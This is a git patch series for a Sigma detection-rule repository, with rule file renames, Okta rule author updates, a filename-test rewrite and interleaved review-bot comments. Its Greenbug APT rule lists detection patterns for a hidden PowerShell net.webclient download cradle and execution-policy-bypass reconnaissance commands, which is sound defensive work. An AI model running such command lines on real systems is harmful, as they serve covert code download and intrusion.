a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_clip.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_var+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_var.yml 
diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_via_var.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_var+.yml b/rules/windows/process_creation/win_invoke_obfuscation_var.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_var+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_var.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_via_var++.yml b/rules/windows/process_creation/win_invoke_obfuscation_via_var.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_via_var++.yml rename to rules/windows/process_creation/win_invoke_obfuscation_via_var.yml diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml similarity index 100% rename from rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml rename to rules/windows/process_creation/win_susp_winrm_awl_bypass.yml From ab5f5f95bc1a7348184afc233ae8909e01487eb4 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Wed, 22 Sep 2021 16:27:05 +0200 Subject: [PATCH 1048/1367] fix filename --- ...les_creation_by_office_applications_using_file_extentions.yml} | 0 ...e_applications_from_proxy_executing_regsvr32_with_payload.yml} | 0 ...ess_creation_office_applications_spawning_wmi_commandline.yml} | 0 .../{win_manage-bde_lolbas.yml => win_manage_bde_lolbas.yml} | 0 .../{win_susp_vboxdrvInst.yml => win_susp_vboxdrvinst.yml} | 0 .../{sysmon_cve-2020-1048.yml => sysmon_cve_2020_1048.yml} | 0 6 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/{sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml => file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml} (100%) rename rules/windows/{sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml => process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml} (100%) rename rules/windows/{sysmon/Office_Applications_Spawning_WMI_command-line.yml => process_creation/process_creation_office_applications_spawning_wmi_commandline.yml} (100%) rename rules/windows/process_creation/{win_manage-bde_lolbas.yml => win_manage_bde_lolbas.yml} (100%) rename rules/windows/process_creation/{win_susp_vboxdrvInst.yml => win_susp_vboxdrvinst.yml} (100%) rename rules/windows/registry_event/{sysmon_cve-2020-1048.yml => sysmon_cve_2020_1048.yml} (100%) diff --git a/rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml similarity index 100% rename from rules/windows/sysmon/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml rename to rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml 
diff --git a/rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml similarity index 100% rename from rules/windows/sysmon/Monitor_Office_Applications_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml diff --git a/rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/process_creation_office_applications_spawning_wmi_commandline.yml similarity index 100% rename from rules/windows/sysmon/Office_Applications_Spawning_WMI_command-line.yml rename to rules/windows/process_creation/process_creation_office_applications_spawning_wmi_commandline.yml diff --git a/rules/windows/process_creation/win_manage-bde_lolbas.yml b/rules/windows/process_creation/win_manage_bde_lolbas.yml similarity index 100% rename from rules/windows/process_creation/win_manage-bde_lolbas.yml rename to rules/windows/process_creation/win_manage_bde_lolbas.yml diff --git a/rules/windows/process_creation/win_susp_vboxdrvInst.yml b/rules/windows/process_creation/win_susp_vboxdrvinst.yml similarity index 100% rename from rules/windows/process_creation/win_susp_vboxdrvInst.yml rename to rules/windows/process_creation/win_susp_vboxdrvinst.yml diff --git a/rules/windows/registry_event/sysmon_cve-2020-1048.yml b/rules/windows/registry_event/sysmon_cve_2020_1048.yml similarity index 100% rename from rules/windows/registry_event/sysmon_cve-2020-1048.yml rename to rules/windows/registry_event/sysmon_cve_2020_1048.yml From 9924cc39468589ffd26d1a788bea28f39229154c Mon Sep 17 00:00:00 2001 
From: unknown
Date: Wed, 22 Sep 2021 10:33:04 -0400
Subject: [PATCH 1049/1367] win-apt-greenbug-fix amend b64 value of /server= as seen in IOC
---
 rules/windows/process_creation/win_apt_greenbug_may20.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/rules/windows/process_creation/win_apt_greenbug_may20.yml b/rules/windows/process_creation/win_apt_greenbug_may20.yml
index e3f03715..443beebb 100644
--- a/rules/windows/process_creation/win_apt_greenbug_may20.yml
+++ b/rules/windows/process_creation/win_apt_greenbug_may20.yml
@@ -39,7 +39,7 @@ detection:
 - ' -nop -w hidden -c $m=new-object net.webclient;$m'
 - '-noninteractive -executionpolicy bypass whoami'
 - '-noninteractive -executionpolicy bypass netstat -a'
- - 'L3NlcnZlcj0=' # base64 encoded '/server='
+ - 'L3NlcnZlcj1' # base64 encoded '/server='
 selection4:
 Image|endswith:
 - '\adobe\Adobe.exe'
From 6e6d57b019283eabcfe5b69b758a1b5d5618bdf8 Mon Sep 17 00:00:00 2001
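Review bot: The new value `L3NlcnZlcj1` no longer matches the padded form `L3NlcnZlcj0=` that the removed line covered, so an encoded payload that ends exactly at `/server=` is now missed; the two differ in the last character because the new one encodes `/server=` followed by a byte whose top two bits are 01 (ASCII 0x40–0x7F, i.e. a letter-range character). Both forms also assume `/server=` begins on a 3-byte boundary of the encoded data — at the other two alignments the same argument encodes as `9zZXJ2ZXI9` and `vc2VydmVyP`, neither of which is in the list. Unless the IOC is known to fix the alignment, keep both values and make the comments precise, e.g. `- 'L3NlcnZlcj0=' # base64 '/server=' at end of the encoded string` and `- 'L3NlcnZlcj1' # base64 '/server=' followed by a letter-range byte`, adding the two alignment variants if broader coverage is intended. The enclosing selection and its field modifier start outside the hunk, so whether this is a `contains` match is not visible here.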
From: frack113 Date: Wed, 22 Sep 2021 18:45:08 +0200 Subject: [PATCH 1050/1367] fix filename --- ...ty.yml => win_exploit_cve_2021_1675_printspooler_security.yml} | 0 .../{win_GPO_scheduledtasks.yml => win_gpo_scheduledtasks.yml} | 0 ...in+_services.yml => win_invoke_obfuscation_stdin_services.yml} | 0 ...ity.yml => win_invoke_obfuscation_stdin_services_security.yml} | 0 ...tial_cve-2019-0708.yml => win_rdp_potential_cve_2019_0708.yml} | 0 ...ml => file_event_script_creation_by_office_using_file_ext.yml} | 0 ...ortAgent_failed.yml => win_exchange_transportagent_failed.yml} | 0 ...scation_stdin+.yml => powershell_invoke_obfuscation_stdin.yml} | 0 ...t_executable_and_script_creation_by_office_using_file_ext.yml} | 0 ...ns.yml => process_creation_lolbins_by_office_applications.yml} | 0 ... => process_creation_lolbins_with_wmiprvse_parent_process.yml} | 0 ...ess_creation_office_from_proxy_executing_regsvr32_payload.yml} | 0 ...ss_creation_office_from_proxy_executing_regsvr32_payload2.yml} | 0 ...e.yml => process_creation_office_spawning_wmi_commandline.yml} | 0 ...{process_creation_SDelete.yml => process_creation_sdelete.yml} | 0 ...voke_obfuscation_clip+.yml => win_invoke_obfuscation_clip.yml} | 0 ...ke_obfuscation_stdin+.yml => win_invoke_obfuscation_stdin.yml} | 0 ...ble_privilege_escalation_via_service_registry_permissions.yml} | 0 18 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/builtin/{win_exploit_cve_2021_1675_printspooler_Security.yml => win_exploit_cve_2021_1675_printspooler_security.yml} (100%) rename rules/windows/builtin/{win_GPO_scheduledtasks.yml => win_gpo_scheduledtasks.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_stdin+_services.yml => win_invoke_obfuscation_stdin_services.yml} (100%) rename rules/windows/builtin/{win_invoke_obfuscation_stdin+_services_security.yml => win_invoke_obfuscation_stdin_services_security.yml} (100%) rename rules/windows/builtin/{win_rdp_potential_cve-2019-0708.yml => 
win_rdp_potential_cve_2019_0708.yml} (100%) rename rules/windows/file_event/{file_event_script_files_creation_by_office_applications_using_file_extentions.yml => file_event_script_creation_by_office_using_file_ext.yml} (100%) rename rules/windows/other/{win_exchange_TransportAgent_failed.yml => win_exchange_transportagent_failed.yml} (100%) rename rules/windows/powershell/{powershell_invoke_obfuscation_stdin+.yml => powershell_invoke_obfuscation_stdin.yml} (100%) rename rules/windows/process_creation/{Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml => file_event_executable_and_script_creation_by_office_using_file_ext.yml} (100%) rename rules/windows/process_creation/{Monitor_LOLBins_Process_Creations_by_Office_applications.yml => process_creation_lolbins_by_office_applications.yml} (100%) rename rules/windows/process_creation/{Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml => process_creation_lolbins_with_wmiprvse_parent_process.yml} (100%) rename rules/windows/process_creation/{process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml => process_creation_office_from_proxy_executing_regsvr32_payload.yml} (100%) rename rules/windows/process_creation/{process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml => process_creation_office_from_proxy_executing_regsvr32_payload2.yml} (100%) rename rules/windows/process_creation/{Monitor_Office_Applications_Spawning_WMI_command-line.yml => process_creation_office_spawning_wmi_commandline.yml} (100%) rename rules/windows/process_creation/{process_creation_SDelete.yml => process_creation_sdelete.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_clip+.yml => win_invoke_obfuscation_clip.yml} (100%) rename rules/windows/process_creation/{win_invoke_obfuscation_stdin+.yml => win_invoke_obfuscation_stdin.yml} (100%) rename 
rules/windows/process_creation/{process_creation_possible_privilege_escalation_via_service_registry_permissions.yml => win_possible_privilege_escalation_via_service_registry_permissions.yml} (100%) diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml similarity index 100% rename from rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_Security.yml rename to rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml diff --git a/rules/windows/builtin/win_GPO_scheduledtasks.yml b/rules/windows/builtin/win_gpo_scheduledtasks.yml similarity index 100% rename from rules/windows/builtin/win_GPO_scheduledtasks.yml rename to rules/windows/builtin/win_gpo_scheduledtasks.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin_services.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_stdin+_services.yml rename to rules/windows/builtin/win_invoke_obfuscation_stdin_services.yml diff --git a/rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml b/rules/windows/builtin/win_invoke_obfuscation_stdin_services_security.yml similarity index 100% rename from rules/windows/builtin/win_invoke_obfuscation_stdin+_services_security.yml rename to rules/windows/builtin/win_invoke_obfuscation_stdin_services_security.yml diff --git a/rules/windows/builtin/win_rdp_potential_cve-2019-0708.yml b/rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml similarity index 100% rename from rules/windows/builtin/win_rdp_potential_cve-2019-0708.yml rename to rules/windows/builtin/win_rdp_potential_cve_2019_0708.yml 
diff --git a/rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml b/rules/windows/file_event/file_event_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/file_event/file_event_script_files_creation_by_office_applications_using_file_extentions.yml rename to rules/windows/file_event/file_event_script_creation_by_office_using_file_ext.yml diff --git a/rules/windows/other/win_exchange_TransportAgent_failed.yml b/rules/windows/other/win_exchange_transportagent_failed.yml similarity index 100% rename from rules/windows/other/win_exchange_TransportAgent_failed.yml rename to rules/windows/other/win_exchange_transportagent_failed.yml diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml similarity index 100% rename from rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml rename to rules/windows/powershell/powershell_invoke_obfuscation_stdin.yml diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml similarity index 100% rename from rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml rename to rules/windows/process_creation/file_event_executable_and_script_creation_by_office_using_file_ext.yml diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/process_creation_lolbins_by_office_applications.yml similarity index 100% rename from rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml rename to rules/windows/process_creation/process_creation_lolbins_by_office_applications.yml 
diff --git a/rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/process_creation/process_creation_lolbins_with_wmiprvse_parent_process.yml similarity index 100% rename from rules/windows/process_creation/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml rename to rules/windows/process_creation/process_creation_lolbins_with_wmiprvse_parent_process.yml diff --git a/rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload.yml similarity index 100% rename from rules/windows/process_creation/process_creation_office_applications_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload.yml diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload2.yml similarity index 100% rename from rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_from_proxy_executing_regsvr32_payload2.yml diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/process_creation_office_spawning_wmi_commandline.yml similarity index 100% rename from rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml rename to rules/windows/process_creation/process_creation_office_spawning_wmi_commandline.yml 
diff --git a/rules/windows/process_creation/process_creation_SDelete.yml b/rules/windows/process_creation/process_creation_sdelete.yml similarity index 100% rename from rules/windows/process_creation/process_creation_SDelete.yml rename to rules/windows/process_creation/process_creation_sdelete.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_clip+.yml b/rules/windows/process_creation/win_invoke_obfuscation_clip.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_clip+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_clip.yml diff --git a/rules/windows/process_creation/win_invoke_obfuscation_stdin+.yml b/rules/windows/process_creation/win_invoke_obfuscation_stdin.yml similarity index 100% rename from rules/windows/process_creation/win_invoke_obfuscation_stdin+.yml rename to rules/windows/process_creation/win_invoke_obfuscation_stdin.yml diff --git a/rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml b/rules/windows/process_creation/win_possible_privilege_escalation_via_service_registry_permissions.yml similarity index 100% rename from rules/windows/process_creation/process_creation_possible_privilege_escalation_via_service_registry_permissions.yml rename to rules/windows/process_creation/win_possible_privilege_escalation_via_service_registry_permissions.yml From 59891270355fa1e56390afcbee15d743befe20e1 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 22 Sep 2021 19:02:44 +0200 Subject: [PATCH 1051/1367] optimization of name detection --- tests/test_rules.py | 31 ++++++++++++++++++++----------- 1 file changed, 20 insertions(+), 11 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index ebdbfa27..78bc956a 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py 
@@ -47,18 +47,18 @@ class TestRules(unittest.TestCase):
 return data
 # Tests
- def test_confirm_extension_is_yml(self):
- files_with_incorrect_extensions = []
+ # def test_confirm_extension_is_yml(self):
+ # files_with_incorrect_extensions = []
- for file in self.yield_next_rule_file_path(self.path_to_rules):
- file_name_and_extension = os.path.splitext(file)
- if len(file_name_and_extension) == 2:
- extension = file_name_and_extension[1]
- if extension != ".yml":
- files_with_incorrect_extensions.append(file)
+ # for file in self.yield_next_rule_file_path(self.path_to_rules):
+ # file_name_and_extension = os.path.splitext(file)
+ # if len(file_name_and_extension) == 2:
+ # extension = file_name_and_extension[1]
+ # if extension != ".yml":
+ # files_with_incorrect_extensions.append(file)
- self.assertEqual(files_with_incorrect_extensions, [], Fore.RED +
- "There are rule files with extensions other than .yml")
+ # self.assertEqual(files_with_incorrect_extensions, [], Fore.RED +
+ # "There are rule files with extensions other than .yml")
 def test_legal_trademark_violations(self):
 files_with_legal_issues = []
@@ -522,7 +522,16 @@ class TestRules(unittest.TestCase):
 filename_pattern = re.compile('[a-z0-9_]{10,70}\.yml')
 for file in self.yield_next_rule_file_path(self.path_to_rules):
 filename = os.path.basename(file)
- if filename_pattern.match(filename) == None or not '_' in filename:
+ if filename[-4:] != ".yml":
+ print(Fore.YELLOW + "Rule {} has a invalid extension (.yml).".format(file))
+ faulty_rules.append(file)
+ elif len(filename) > 74:
+ print(Fore.YELLOW + "Rule {} has a file name too long >70.".format(file))
+ faulty_rules.append(file)
+ elif len(filename) < 14:
+ print(Fore.YELLOW + "Rule {} has a file name too sort <10.".format(file))
+ faulty_rules.append(file)
+ elif filename_pattern.match(filename) == None or not '_' in filename:
 print(Fore.YELLOW + "Rule {} has a file name that doesn't match our standard.".format(file))
 faulty_rules.append(file)
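Review bot: `test_confirm_extension_is_yml` is commented out rather than removed, which leaves a dozen lines of dead code in the class and hides from the test runner that a case was dropped; since the second hunk folds the `.yml` check into the filename test, delete the method outright (history keeps it). If it is meant to be restored later, a `@unittest.skip("folded into the filename test")` decorator on the live method keeps it visible in the run summary instead of silently vanishing from the suite.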
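Review bot: The messages on the two new length branches do not say what their conditions test, and one has a typo — `len(filename) > 74` prints `>70` and `len(filename) < 14` prints `too sort <10`, leaving the reader to infer the 4-character `.yml` offset. Suggest `print(Fore.YELLOW + "Rule {} has a file name longer than 70 characters (excluding .yml).".format(file))` and `print(Fore.YELLOW + "Rule {} has a file name shorter than 10 characters (excluding .yml).".format(file))`. The re-added final branch compares with `== None`; `filename_pattern.match(filename) is None` is the idiomatic form, and because `match` anchors only at the start, `fullmatch` (or a `$` in the pattern) would additionally reject names such as `abcdefghij.yml_extra.yml`, which pass the new extension and length checks and still match the pattern. The test method's `def` line and the `faulty_rules` initialisation are outside the hunk.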
From f186235d8fbc68e1d5b958aff8afb89ed22a6e64 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:25 -0500 Subject: [PATCH 1052/1367] Update okta_admin_role_assigned_to_user_or_group.yml --- rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml index 1ded4c5d..e4a20189 100644 --- a/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml +++ b/rules/cloud/okta/okta_admin_role_assigned_to_user_or_group.yml @@ -1,7 +1,7 @@ title: Okta Admin Role Assigned to an User or Group id: 413d4a81-6c98-4479-9863-014785fd579c description: Detects when an the Administrator role is assigned to an user or group. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 1a64dc03a1d59b42ae2858ef15f43648ec3047f9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:31 -0500 Subject: [PATCH 1053/1367] Update okta_api_token_created.yml --- rules/cloud/okta/okta_api_token_created.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_api_token_created.yml b/rules/cloud/okta/okta_api_token_created.yml index 99bff4e8..9ec18dd6 100644 --- a/rules/cloud/okta/okta_api_token_created.yml +++ b/rules/cloud/okta/okta_api_token_created.yml @@ -1,7 +1,7 @@ title: Okta API Token Created id: 19951c21-229d-4ccb-8774-b993c3ff3c5c description: Detects when a API token is created -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 8dfae4c78553a93837f4527b0f233d5e5e5e2f77 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Wed, 22 Sep 2021 19:51:44 -0500 Subject: [PATCH 1054/1367] Update okta_api_token_revoked.yml --- rules/cloud/okta/okta_api_token_revoked.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_api_token_revoked.yml b/rules/cloud/okta/okta_api_token_revoked.yml index 76738fb9..3e3ae817 100644 --- a/rules/cloud/okta/okta_api_token_revoked.yml +++ b/rules/cloud/okta/okta_api_token_revoked.yml @@ -1,7 +1,7 @@ title: Okta API Token Revoked id: cf1dbc6b-6205-41b4-9b88-a83980d2255b description: Detects when a API Token is revoked. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 11732970fca40060406a6fac0badd84429980832 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:51 -0500 Subject: [PATCH 1055/1367] Update okta_application_modified_or_deleted.yml --- rules/cloud/okta/okta_application_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_application_modified_or_deleted.yml b/rules/cloud/okta/okta_application_modified_or_deleted.yml index 63401971..44d81357 100644 --- a/rules/cloud/okta/okta_application_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Application Modified or Deleted id: 7899144b-e416-4c28-b0b5-ab8f9e0a541d description: Detects when an application is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 12f76cdf6b5acbfe44ac2f800f829868553cb923 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:51:58 -0500 Subject: [PATCH 1056/1367] Update okta_application_sign-on_policy_modified_or_deleted.yml --- .../okta_application_sign-on_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml index 3b067027..e8e950b9 100644 --- a/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_application_sign-on_policy_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Application Sign-On Policy Modified or Deleted id: 8f668cc4-c18e-45fe-ad00-624a981cf88a description: Detects when an application Sign-on Policy is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 38e09f061dcbe7b3fd55742854316fa4dc2d8e96 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:04 -0500 Subject: [PATCH 1057/1367] Update okta_mfa_reset_or_deactivated.yml --- rules/cloud/okta/okta_mfa_reset_or_deactivated.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml index ba789082..fc8797b3 100644 --- a/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml +++ b/rules/cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -1,7 +1,7 @@ title: Okta MFA Reset or Deactivated id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 description: Detects when an attempt at deactivating or resetting MFA. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/21 references: From e1eb8c6222f69b3ae54e20a732a546604c40da20 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:10 -0500 Subject: [PATCH 1058/1367] Update okta_network_zone_deactivated_or_deleted.yml --- rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml index 5d174c95..7b38076c 100644 
--- a/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml +++ b/rules/cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Network Zone Deactivated or Deleted id: 9f308120-69ed-4506-abde-ac6da81f4310 description: Detects when an Network Zone is Deactivated or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From cead26637ba6f58050444214ab42411792b98aa0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:17 -0500 Subject: [PATCH 1059/1367] Update okta_policy_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_modified_or_deleted.yml index 2e72accd..010f0283 100644 --- a/rules/cloud/okta/okta_policy_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_modified_or_deleted.yml @@ -1,7 +1,7 @@ title: Okta Policy Modified or Deleted id: 1667a172-ed4c-463c-9969-efd92195319a description: Detects when an Okta policy is modified or deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 1aec430291bb01ad2bed78cab276eea1f795b3c7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:23 -0500 Subject: [PATCH 1060/1367] Update okta_policy_rule_modified_or_deleted.yml --- rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml index 0cc96a97..4add1cda 100644 --- a/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml +++ b/rules/cloud/okta/okta_policy_rule_modified_or_deleted.yml 
@@ -1,7 +1,7 @@ title: Okta Policy Rule Modified or Deleted id: 0c97c1d3-4057-45c9-b148-1de94b631931 description: Detects when an Policy Rule is Modified or Deleted. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 2ab5ba0a0c4fbdeb9d86c2979a4d40813dc05be4 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:29 -0500 Subject: [PATCH 1061/1367] Update okta_security_threat_detected.yml --- rules/cloud/okta/okta_security_threat_detected.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_security_threat_detected.yml b/rules/cloud/okta/okta_security_threat_detected.yml index 1284f8c9..73c9b331 100644 --- a/rules/cloud/okta/okta_security_threat_detected.yml +++ b/rules/cloud/okta/okta_security_threat_detected.yml @@ -1,7 +1,7 @@ title: Okta Security Threat Detected id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 description: Detects when an security threat is detected in Okta. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: From 275ebf7884097f849fb04e7902622762232e8ca9 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 22 Sep 2021 19:52:36 -0500 Subject: [PATCH 1062/1367] Update okta_unauthorized_access_to_app.yml --- rules/cloud/okta/okta_unauthorized_access_to_app.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/okta/okta_unauthorized_access_to_app.yml b/rules/cloud/okta/okta_unauthorized_access_to_app.yml index f0045b70..113cb352 100644 --- a/rules/cloud/okta/okta_unauthorized_access_to_app.yml +++ b/rules/cloud/okta/okta_unauthorized_access_to_app.yml @@ -1,7 +1,7 @@ title: Okta Unauthorized Access to App id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 description: Detects when unauthorized access to app occurs. -author: Austin Songer +author: Austin Songer @austinsonger status: experimental date: 2021/09/12 references: 
